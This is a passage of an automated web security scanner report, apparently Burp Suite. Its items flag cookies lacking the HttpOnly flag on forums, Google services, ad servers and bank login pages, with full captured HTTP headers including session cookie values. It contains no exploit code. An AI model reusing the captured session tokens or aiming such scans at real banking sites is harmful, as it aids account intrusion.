Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:09:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=64b0aa494dbd18ef811cba2e3564fb05; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:09:33 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331421-how-to-upgrade/page__pid__2075931#entry2075931
Content-Length: 0
Connection: close
Content-Type: text/html


11.270. http://community.invisionpower.com/tracker/issue-21358-small-input-field-behavior-issue-after-updating-status/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /tracker/issue-21358-small-input-field-behavior-issue-after-updating-status/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tracker/issue-21358-small-input-field-behavior-issue-after-updating-status/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:21:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=b400fd3d3e9548a0018870f5687dcd41; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:21:41 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:21:41 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_tracker_items=eJxLtDK0qs60MjI0NrWwzrQyNLI0M7M0MrG0tK4FXDBiFgbX; expires=Fri, 03-Feb-2012 00:21:41 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 56301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.271. http://goto.ext.google.com/og-dogfood-issue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goto.ext.google.com
Path:   /og-dogfood-issue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-dogfood-issue HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-dogfood-issue
Set-Cookie: S=apphosting=lDi9AZW82FVRTOIu6kCZNw; path=/
Date: Thu, 03 Feb 2011 01:02:48 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close


11.272. http://goto.ext.google.com/og-exp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goto.ext.google.com
Path:   /og-exp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-exp HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-exp
Set-Cookie: S=apphosting=_A7v3AzE7Pn5yk9amuUM6w; path=/
Date: Thu, 03 Feb 2011 01:02:48 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close


11.273. http://groups.google.com/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=631694ff1b7a6154:TM=1296694969:LM=1296694970:S=4NhZ0w32Gl9oo3YP; expires=Sat, 02-Feb-2013 01:02:50 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...

11.274. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8d6590cd6d6bae50:TM=1296694971:LM=1296694971:S=-Xvd35p4ZHDH2YL5; expires=Sat, 02-Feb-2013 01:02:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 01:02:51 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

11.275. http://homeloanhelp.bankofamerica.com/en/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://homeloanhelp.bankofamerica.com
Path:   /en/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/index.html HTTP/1.1
Host: homeloanhelp.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:31 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=2, max=52
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=44922ab53660;expires=Wed, 02-Feb-11 23:11:31 GMT;path=/
Content-Length: 20976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" dir="
...[SNIP]...

11.276. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTgwNiZ0bD01MTg0MDA=&piggybackCookie=uid:D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; KTPCACOOKIE=YES; pubfreq_26263=207-2; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:36:13 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.277. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jpmorganchase.112.2o7.net
Path:   /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345 HTTP/1.1
Host: jpmorganchase.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 01:02:55 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/
Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Wed, 02 Feb 2011 01:02:55 GMT
Last-Modified: Fri, 04 Feb 2011 01:02:55 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www11
Content-Length: 0
Content-Type: text/plain
Connection: close


11.278. http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jpmorganchase.112.2o7.net
Path:   /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&ndh=1&t=2/1/2011%2016%3A31%3A14%203%20360&ns=jpmorganchase&pageName=J.P.%20Morgan&g=http%3A//www.jpmorgan.com/pages/jpmorgan&r=http%3A//burp/show/20&cc=USD&c1=jpmorgan&c2=Generic_Content_Page_Template&c11=J.P.%20Morgan&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: jpmorganchase.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; Expires=Mon, 1 Feb 2016 22:30:13 GMT; Domain=jpmorganchase.112.2o7.net; Path=/
Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&vidn=26A4ED7A85148B7E-600001624041C7B6&&ndh=1&t=2/1/2011%2016%3A31%3A14%203%20360&ns=jpmorganchase&pageName=J.P.%20Morgan&g=http%3A//www.jpmorgan.com/pages/jpmorgan&r=http%3A//burp/show/20&cc=USD&c1=jpmorgan&c2=Generic_Content_Page_Template&c11=J.P.%20Morgan&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Tue, 01 Feb 2011 22:30:13 GMT
Last-Modified: Thu, 03 Feb 2011 22:30:13 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www218
Content-Length: 0
Content-Type: text/plain


11.279. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpOvL!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:59:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=ZPdSNJpwHg02FezBdbdh3cwUwX4NH8Y4FezBYTeh3cQ3gZ4NHQTnGezBF2ph3cAohX4NHYZ4FezBKGeh3cwohX4NHca4FezBiGeh3cQshX4NwOIAM/oROI7YBwAoGXzr1NQcKa8GGKmAI9YRVN53DkL3FyxgPTw6TVIQsuWB/0mBOca7FIaWGserMWw41ZE+kqlB6bjB4p6bCwWZGX5r4fQsMawEwa3BW8oBT0I9HsfzFSxsNeQQoa4Ns2zB1xmRK6KzIUyhGAH; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/
Set-Cookie: GUID=MTI5NjY4Mzk5MzsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 02 Feb 2011 22:59:53 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.280. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=03d52d734688b9f9:TM=1296694992:LM=1296694992:S=Sxwm6_Rm9Djrrfxk; expires=Sat, 02-Feb-2013 01:03:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

11.281. http://maps.google.com/maps/place  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/place HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=ae5c87462744c339:TM=1296694994:LM=1296694994:S=NlEpC7Xf_5x56Eww; expires=Sat, 02-Feb-2013 01:03:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...

11.282. http://maps.yahoo.com/set_beta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /set_beta

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_beta HTTP/1.1
Host: maps.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:03:15 GMT
Set-Cookie: B=3eaqqlp6kjvmj&b=3&s=bk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3344

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

11.283. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccounts.navyfcu.org
Path:   /cgi-bin/ifsewwwc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/ifsewwwc?Logon HTTP/1.1
Host: myaccounts.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:06 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpool-MYACCOUNTS-IFSE_1443=1091045898.41733.0000; path=/
Content-Length: 15013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template filename: LogonForm.html 65 -->
<html xmlns="http://www.w3.org/1
...[SNIP]...

11.284. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signon HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:02:13 GMT
Cache-Control: no-cache="set-cookie"
X-Cnection: close
Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com;
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://online.wellsfargo.com/logi
...[SNIP]...

11.285. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/AuthService HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:13 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
